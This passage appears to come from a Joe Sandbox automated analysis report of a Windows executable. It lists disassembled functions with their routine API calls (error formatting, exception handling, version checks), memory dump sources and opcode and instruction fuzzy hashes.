    • Opcode Fuzzy Hash: ebe4249a77bd8ae2aac87abdc53c848f38c21425fbd8ec7a6c45d2d38652e3d7
    • Instruction Fuzzy Hash: A1019E36500308BAE7109BA4DC45FDA7BBCEF09710F008062BA04A7151D370A954DBA5
    Function 000B7727 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(000B7886,?,00000400), ref: 000B7727
    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 000B7748
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: df38434322dbfd9951631fc55af2dcc5100b9c0b56ba6c7f135ca5c65383944c
    • Instruction ID: 6da30597b04b2f8ae43e310c4fc0fbb853e40ee58b2646fb2369c1e68d32f147
    • Opcode Fuzzy Hash: df38434322dbfd9951631fc55af2dcc5100b9c0b56ba6c7f135ca5c65383944c
    • Instruction Fuzzy Hash: 2FD0C93138C340BBFB510B705C8AF6E779ABB95F51F14C824B759E80E0DAB49424A729
    Function 000E2BA4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000E2B9F,?,?,00000008,?,?,000E283F,00000000), ref: 000E2DD1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: ae566a10fd3ae52ee9c3e84187a4cc84536cd8eddd33e59a4e4a964891fef641
    • Instruction ID: 89de230102ff9df68d804cf34b49708628a7847f2bca6819cf2728d35ef1b0f5
    • Opcode Fuzzy Hash: ae566a10fd3ae52ee9c3e84187a4cc84536cd8eddd33e59a4e4a964891fef641
    • Instruction Fuzzy Hash: CAB19F31210648DFD759CF29C886B687BE4FF45364F298658E9DADF2A1C335E981CB40
    Function 000D0816 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000D082C
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: ac10ce5f4fad309ab8a297ce7bc4dca7550a9857fc218a4ee81c5f73bc52ff4d
    • Instruction ID: 96808058b43a71d378616b074257e8a5cfeb86fec97a76a42f4ecc9bcbd82478
    • Opcode Fuzzy Hash: ac10ce5f4fad309ab8a297ce7bc4dca7550a9857fc218a4ee81c5f73bc52ff4d
    • Instruction Fuzzy Hash: 0C516AB1A053058FEB18CF54D9957AEBBF0FB48310F24856AD459EB3A1D778A940CFA0
    Function 000BC365 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    APIs
    • GetVersionExW.KERNEL32(?), ref: 000BC388
      • Part of subcall function 000BC3F7: __EH_prolog.LIBCMT ref: 000BC3FC
      • Part of subcall function 000BC3F7: CoCreateInstance.COMBASE(000E68A0,00000000,00000001,000E67D0,?), ref: 000BC41E
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateH_prologInstanceVersion
    • String ID:
    • API String ID: 511865808-0
    • Opcode ID: b710f731ac5dfb897398c3421b259b309ac9d3c9563b50ffbfba7e097d975d6f
    • Instruction ID: e94bad21461e5726c1473cf4d2610f779169e064e1ad6848e45ce61906cf5d67
    • Opcode Fuzzy Hash: b710f731ac5dfb897398c3421b259b309ac9d3c9563b50ffbfba7e097d975d6f
    • Instruction Fuzzy Hash: ACF0AE305042889BFF65D760A8597EC37E44711B19F4480D6C14052552CBB94BC6EF72
    Function 000B4A8E Relevance: 1.5, Strings: 1, Instructions: 276COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID: gj
    • API String ID: 0-4203073231
    • Opcode ID: ef78f5a18e5c7afcff04352d87bf50df96c67ca7ac407f5e8c7baa2e0efe63f1
    • Instruction ID: 1e35588e495165209a46c2cc45a6bf422960618df9b67617e8f09a7e8c6b3280
    • Opcode Fuzzy Hash: ef78f5a18e5c7afcff04352d87bf50df96c67ca7ac407f5e8c7baa2e0efe63f1
    • Instruction Fuzzy Hash: 0AC147B2A183818FC754CF29D88065AFBE1BFC9208F19892DE998D7301D774E945CB96
    Function 000D0B8D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
    Download Yara Rule
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00020BA0,000D05F5), ref: 000D0B92
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: de30f303284d29d2fb2c46af4523dca3dc6f2d001e59443b13851e194fdaafdc
    • Instruction ID: aef553e41fedc3bcc759dd9000229ef6fb56e6cf545d1726b12978b2b1acdf27
    • Opcode Fuzzy Hash: de30f303284d29d2fb2c46af4523dca3dc6f2d001e59443b13851e194fdaafdc
    • Instruction Fuzzy Hash:
    Function 000DD1E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: 5a04abeb954b02ef4aebe4c9ac93a810c15488ae2056d2ebb54403db0bc7be01
    • Instruction ID: d3b555edacd24878cb4c4ada58af4508a3c3eefff3e7bc4440079dbcc872acb8
    • Opcode Fuzzy Hash: 5a04abeb954b02ef4aebe4c9ac93a810c15488ae2056d2ebb54403db0bc7be01
    • Instruction Fuzzy Hash: FAA012301011008B57004F315B442083595A742E803008064D104C4160E72440904601
    Function 000C741E Relevance: .8, Instructions: 807COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 14107ab2eb677d89ab82a9e8cd0b58c2513a27d64da7517e3f9df36b52c7f408
    • Instruction ID: a605625fa37f9bf3461e24c8dfad17f0cea41774fcb6cfccd31644fc2b716773
    • Opcode Fuzzy Hash: 14107ab2eb677d89ab82a9e8cd0b58c2513a27d64da7517e3f9df36b52c7f408
    • Instruction Fuzzy Hash: 4162C271608B859FCB29CF38C490BBD7BE1AF95304F18896DE99E8B342D734A945CB10
    Function 000C889F Relevance: .8, Instructions: 781COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 686ee81217faa8b25d92411dde72c974ae3b132d04929721e9996bdb0a46f4d9
    • Instruction ID: a2691ea3df3a1f97a98f4e537528d89d6165c13acef27f7926d86251a85b05de
    • Opcode Fuzzy Hash: 686ee81217faa8b25d92411dde72c974ae3b132d04929721e9996bdb0a46f4d9
    • Instruction Fuzzy Hash: 2462F2716082459FCB18CF28C494ABDBBE1BF95304F08C66DEC9A8B386DB30E945DB55
    Function 000C07A0 Relevance: .7, Instructions: 694COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 232d43c48be5cce88d6a67f63a1396d6ddf25a265867b35122af6f8bff066f68
    • Instruction ID: fb893bdf72f163438b1ba68cf898c9e9fdb1655c62216a6ccea8da0e46fe6421
    • Opcode Fuzzy Hash: 232d43c48be5cce88d6a67f63a1396d6ddf25a265867b35122af6f8bff066f68
    • Instruction Fuzzy Hash: 68525872A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5859B255D734EA19CB86
    Function 000C8243 Relevance: .5, Instructions: 528COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8fc5d90e3d3db3c1efeadd43c82ab0011a4bf8cdeb23a77e5de6e7a1e8cf8e6d
    • Instruction ID: 90550e805b30204a3083bcc48723135a564af045e6d45c78b536a588bec55222
    • Opcode Fuzzy Hash: 8fc5d90e3d3db3c1efeadd43c82ab0011a4bf8cdeb23a77e5de6e7a1e8cf8e6d
    • Instruction Fuzzy Hash: E712C2716047468FC728CF28C494BBDB7E1FB54304F10892EE99AC7681EB78E995CB49
    Function 000BD833 Relevance: .5, Instructions: 454COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e2246fcd3e83b70240e2817f7267b01fac98fef6c85105cf9753bd598888e73e
    • Instruction ID: f6116d6801b557fa7c3e7df098129ca96b0d72856dec9c2bd9fc32b04702e335
    • Opcode Fuzzy Hash: e2246fcd3e83b70240e2817f7267b01fac98fef6c85105cf9753bd598888e73e
    • Instruction Fuzzy Hash: 8BF189716083418FC765CF28C484AAEFBE5FF89328F184A2EF4C597256E631E945CB52
    Function 000BFCCC Relevance: .3, Instructions: 320COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fb294ab04e90cc0ce06dd50e6bd048f97e69c970a0f5bb731c9e94b4a6952ed4
    • Instruction ID: e22b515db1d0f6ab501a5e771722060ba361999d6f1a753e5b6160035c16d588
    • Opcode Fuzzy Hash: fb294ab04e90cc0ce06dd50e6bd048f97e69c970a0f5bb731c9e94b4a6952ed4
    • Instruction Fuzzy Hash: CFE148755183908FC704CF29D4804AABBF0BF9A300F4A495EFAD587352C735EA15EBA6
    Function 000C5272 Relevance: .3, Instructions: 270COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5d9d7679fbde78b3247f07612fed3e9cb59a38070ec5122fd68ccd9571fce079
    • Instruction ID: e4b0c3c9785f429ef4f698e89094b306792c15e699deaf45e8c6aa7779092d77
    • Opcode Fuzzy Hash: 5d9d7679fbde78b3247f07612fed3e9cb59a38070ec5122fd68ccd9571fce079
    • Instruction Fuzzy Hash: 809155B4200B459BD728EB64CCA5FFE7BC5EB90305F10092DE99687282EFB4E985C751
    Function 000C55A0 Relevance: .2, Instructions: 243COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction ID: 1f3648ceb6d954cb4ffa7e7b8add3c9a1c98459f5a3efa6951d8d9f2ffe6a9ec
    • Opcode Fuzzy Hash: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction Fuzzy Hash: C3814875308B419BEB34DF28DCD5FFE37D5ABA0305F50092DE9868B283DAA4A8C58751
    Function 000D64C7 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c4d76b976377cb1462aeac44fda2fc1e56c614a1f07e499693e405c22f54187d
    • Instruction ID: 6db3249480c1aa41d80e237dfe3ed91d4d13f9574afcc47a9e4b45d48d6b9877
    • Opcode Fuzzy Hash: c4d76b976377cb1462aeac44fda2fc1e56c614a1f07e499693e405c22f54187d
    • Instruction Fuzzy Hash: 4E617971640B08A6DE789A68A8A5BFE23C4EF05704F14051BE943DB38EDA17EDC18739
    Function 000D6298 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
    • Instruction ID: 11ca7c4d08bd05c44f933214756a5992e30b1204e9ffd98379f20bbfe2736628
    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
    • Instruction Fuzzy Hash: 99516971604B4497DFB48A6885557FF67D59B12300F18092FE882DB783C61BEF458376
    Function 000C02F7 Relevance: .2, Instructions: 161COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cf08668bbbebc652dc05f99108bf70859c0f99c3daa78516f6f3eb84f144d9f9
    • Instruction ID: 9c27166c0c6a152af97626017c1fca676a98a6702aa2cac857ae39c8212cc1b4
